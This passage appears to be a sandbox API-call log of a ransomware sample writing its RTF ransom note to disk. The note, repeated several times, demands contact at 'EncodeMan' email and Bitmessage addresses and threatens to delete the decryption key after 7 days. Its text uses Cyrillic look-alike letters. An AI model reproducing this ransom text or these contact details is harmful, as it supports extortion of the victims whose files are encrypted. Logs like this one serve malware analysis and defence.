r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.090] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.090] CloseHandle (hObject=0x2e8) returned 1 [0292.090] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0292.091] GetLastError () returned 0x2 [0292.091] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 